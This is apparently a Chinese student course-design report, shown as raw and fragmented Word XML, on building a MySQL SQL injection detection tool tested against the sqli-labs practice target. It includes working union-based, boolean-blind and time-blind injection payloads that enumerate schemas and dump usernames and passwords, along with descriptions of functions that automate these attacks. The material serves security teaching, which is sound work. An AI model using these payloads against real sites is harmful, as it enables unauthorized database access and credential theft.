      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2101D3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设计一个基于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MYSQL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数据库系统的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SQL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注入漏洞检测程序或者脚本，能够检测报错注入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盲注和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POST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注入。语言不限，程序功能如下： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FC250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⑴ 能够检测指定的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URL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站点是否存在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SQL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注入。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE358E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⑵ 爆破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MYSQL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数据库实例名。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B94ECB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⑶ 爆破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MYSQL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数据表。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410A327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⑷ 爆破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MYSQL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字段名 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FEE19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⑸ 爆破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MYSQL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字段值 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E3A9A" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc104974579"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>【设计需求及分析】</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CB1A28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⑴ 平台搭建 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB7663F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在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VMWorkstation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中搭建实验环境，即：MAMP=Windows Server、Apache、MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA4014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和 PHP，可以使用 Wamp 包搭建 PHP 集成开发环境，安装包是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Wampserv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。或者使用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hpStudy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软件包，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hpStudy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是一个 PHP 调试环境的程序集成包。该程序包集成最新的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pache+PHP+MySQL+phpMyAdmin+ZendOptimiz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,一次性安装,无须配置即可使用,是非常方便、好用的 PHP 调试环境 。对学习 PHP 的新手来说，环境配置是一件很困难的事；对老手来说也是一件烦琐的事。因此无论你是新手还是老手，该程序包都是一个不错的选择。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hpstudy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：http://down.php.cn/PhpStudy20180211.zip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8F3CB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所需安装环境支持包：http://www.pc6.com/softview/SoftView_104246.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D72E3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⑵ 测试靶机 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD3486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下载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ql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-labs，这是一个印度程序员编写的用来学习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q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注入的教程。下载地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>https://github.com/Audi-1/sqli-labs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，下载后务必将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q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的版本调到 5.5 以上，因为这样你的数据库内才会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schem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数据库，方便进行实验测试。将之前下载的源码解压到 www 目录下，修改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q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-connections/db-creds.inc文件当中的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ysq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账号密码。用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ql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-labs 靶机作为目标机进行测试。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4CC27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⑶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MYSQL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爆库的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步骤和对应的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8B4FC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. 爆破列数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4933DF98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http://xxx/xxx.php?id=2 order by 8 --+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66159EF6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http://xxx/xxx.php?id=2 union select 11,22,33,44 --+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66802DEA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爆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数据库名 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E4F16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>http://xxx/xxx.php?id=2 and 1=2 union select 11,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2,database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),44 --+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DCDA1B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爆表名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</w:p>
    <w:p w14:paraId="5BA812DA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tp://xxx.php?id=2 and 1=2 union select 11,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2,group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_concat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,44 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schema.tabl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=’510cms’--+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E81541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注意：该语句不能执行时一定要设置 php.ini 中的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agic_quotes_gp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 Off，取消字符转义 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37843335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爆 admin 表中的列 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD54DD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http://xxx/xxx.php?id=2 and 1=2 union select </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D8F9B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,22,group_concat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,44 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schema.column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dmin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--+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B07AC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爆 admin 表中列的值 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E822D91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http://xxx/xxx.php?id=2 and 1=2 union select </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631B1CF1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,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2,concat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username,0x20,password),44 from 510cms.admin --+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223240C4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//第一行的值 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB524D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http://xxx/xxx.php?id=2 and 1=2 union select </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC14F87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,22,concat(username,0x20,password),44 from 510cms.admin where username not in(‘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qz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’) --+ //第二行的值 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514DC1E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc104974580"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>【设计功能的实现】</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D17DB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57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概要设计如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149905CD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4D8049C3" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C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1.模块说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9A91D5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080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD989F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提供一个字符串content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8ED70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在控制台输出的形式类似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[09:09:50]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tent”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBB22F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464F86F9" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA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lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F9C663" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>do_sql_inject_union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503CAC3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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A6A0C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如果既不是字符型注入也不是数值型注入，就提示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Targe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does not exist SQL Injection -&gt; Exit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，退出函数。得到注入类型之后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爆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数据库、数据表、数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D71D47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2F1D172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1FCDCED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an_in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0CB45A2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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF231F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使用a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nd 1=1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和and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1=2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进行测试，判断注入类型，如果字符型存在注入就提示“Use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‘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-&gt; Exist SQL Injection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并返回True和注入符号，否则控制台提示用户“U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e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‘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Not Exist SQL Injection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。如果不是字符型注入那就转去判断数值型注入，如果是数值型注入就提示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nteger Type -&gt; Exist SQL Injection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并返回True和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’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teger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，如果不是提示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nteger Type -&gt; Not Exist SQL Injection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,最终返回False和None。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F750291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6F04320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A4C0348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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="080808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_reque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126C72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http://xxx/Less-1/?id=1' and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B2455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打开一个URL连接并向这个连接发出请求，获取响应结果也就是一个http响应对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1BA460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87DDB6E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_ord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symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F57DBA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HYPERLINK "http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://xxx/Less-1/?id=1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，S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ymbol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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>ymbol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’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（注入符号）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7892ADE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返回当前数据表的（列数+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）flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27142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C3DA2F1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3A0D1EA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st_union_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symbol, flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA1DA1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HYPERLINK "http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://xxx/Less-1/?id=1，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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar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注入符号symbol，当前数据表列数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B38AD9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返回union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lect中可注入的位置点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ex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以及显示结果结点分割之后的数组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mp_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7869A3F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7C46100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3C9F2E0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_prefix_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57745D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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBFAB2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返回截取的部分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?id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5316447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84DA41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59D8AF4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_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databa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symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8A91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HYPERLINK "http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://xxx/Less-1/?id=1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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/?id=1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，注入符号symbol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC2B0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让其报错，如果结果中显示MySQL，则返回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’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MySQL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’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，否则返回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’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annot get database’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB8A8E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2FF295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1E22B47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exec_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symbol, flag, index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mp_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function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2CA3048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HYPERLINK "http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://xxx/Less-1/?id=1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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/?id=1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注入符号symbol，当前数据表（列数+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）flag，可注入点index，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数组，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ysq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函数如v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rsion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\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base()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0C52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返回function执行的结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C8E99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DB575E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5792663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_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tabl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symbol, flag, index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mp_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3C28D6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HYPERLINK "http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://xxx/Less-1/?id=1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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/?id=1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，注入符号symbol，（列数+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）flag，注入点index，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数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B6FE9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利用payload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http://xxx/Less-1/?id=0' union select 1,group_concat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),3 from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schema.table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database()--+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得到所有表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52730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2138A8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2B6B66A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lastRenderedPageBreak/>
        <w:t>get_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colum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symbol, flag, index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mp_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0680B1A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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122C803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利用payload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http://xxx/Less-1/?id=0' union select 1,group_concat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umn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),3 from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schema.column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='users' and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database()--+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得到所有字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5040171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5C3E93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7D78EFF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_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symbol, flag, index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mp_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3958B3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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A171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利用payload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http://xxx/Less-1/?id=0' union select 1,group_concat(id,0x3a,username,0x3a,password),3 from users--+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得到users表中的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23C49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03A81E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F96E7C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布尔盲注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B462A68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_sql_injection_speci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DD5E0A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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119214B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  <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：调用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ool_based_inj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 w:hint="eastAsia"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>函数，返回执行结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（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’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>Success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’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>或空）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F08E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DA614E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77DEE70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53121D2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ool_based_inj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18EB34A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250C45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进行布尔盲注，爆库、表、数据，返回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’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uccess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’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表示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布尔盲注成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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F880761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08FF7A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E1D3663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_db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11BC309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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA09BF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利用payload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HYPERLINK "http://xxx/Less-1/?id=1' and substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,1)=115--+"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/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http://xxx/Less-1/?id=1' and substr((select group_concat(schema_name) from information_schema.schemata limit 0,1),1,1)=115--+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，遍历字典进行布尔盲注，返回所有的数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B6842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0E2B819F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36187BD7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_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tabl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_select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6453C11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HYPERLINK "http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://xxx/Less-1/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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/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，选择的数据库名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_selected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C23955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利用payload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HYPERLINK "http://xxx/Less-1/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = 'users' limit 0,1),1,1)=115--+"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/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http://xxx/Less-1/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = 'users' limit 0,1),1,1)=115--+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，返回所有的数据表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2488A9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209BB0CF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0FDAC0F4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_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colum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b_select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b_select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6291C9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HYPERLINK "http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://xxx/Less-1/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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/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，选择的数据库名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b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，选择的数据表名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b_selected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="023BBA4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利用payload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http://xxx/Less-1/?id=1' and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(selec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umn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) from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schema.column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= 'security' and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= 'users' limit 0,1),1,1)=113--+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，返回所有的字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486630AD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1366327F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52ABEDDB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_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="080808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_select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b_selecte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28D0BB7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HYPERLINK "http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://xxx/Less-1/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"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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>://xxx/Less-1/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，选择的字段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ol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，选择的数据表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b_selected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AB53E1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利用payload“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http://xxx/Less-1/?id=1' and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(selec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username}) from users limit 0,1),1,1)=113--+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”输出数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CD5F9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5B497976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2CC59310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32A79592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 w:hint="eastAsia"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>时间盲注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6221C3D3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_time_based_inj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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446261E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?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d=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5386A2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  <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：调用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me_based_inj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860BDE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2624AF2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5FE1DB56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_based_inj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76A85FA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?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d=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469D18C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  <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：调用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me_based_inj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5A98BFE6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3106C4CE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6BB8DC0A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bl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yload_h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yload_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2DDE573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?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d=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C545FB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  <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：得到利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>得到的所有表名以及连接符号的长度，然后利用时</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>间盲注</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>得到每一个字符。函数返回得到的所有表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A75F7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5E2C5F04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674617EF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ge_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payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071112D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payload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http://xxx/Less-1/?id=1' and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f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length((selec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) from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schema.table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database()))=8,sleep(3),1)--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D05AB" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left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如果请求的响应时间大于等于3并且小于6则返回True，否则返回False。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F4E1B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2D844B9C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4755656E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ml_get_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32210AE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>初始条件：payload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http://xxx/Less-1/?id=1' and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f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length((selec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) from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schema.table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database()))=8,sleep(3),1)--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ACD108" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left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操作结果：返回请求的响应时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DBFCD1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0A7EC0C3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3BB59C5B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um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table_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yload_h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yload_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13C2CA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?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d=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C898AC3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  <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：返回所有的字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D25FF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3EC7623B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chose_tab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umn_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yload_head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yload_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02104CE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?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d=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4663CB42" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：返回所有的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D796E6E" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244CA">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368E5F6F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0EEFE757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 w:hint="eastAsia"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="080808"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AA90F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76845D9E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_injection_po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4F0866F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e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x.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1061FECD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  <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：调用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ime_based_injec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1A78AA62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222D3603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3B7DE4B6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n_inj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st_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67BBE8D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http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://xxx/Less-1/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?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d=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE162D1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  <w:color w:val="000000"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>操作结果：判断当前表单提交页面是否存在POST注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798C16C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5A410960" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="009244C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0C118A1C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que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data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC0CA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初始条件：URL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HYPERLINK "http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>://xxx/Less-1/,</w:instrTex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instrText>post"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instrText xml:space="preserve"> </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
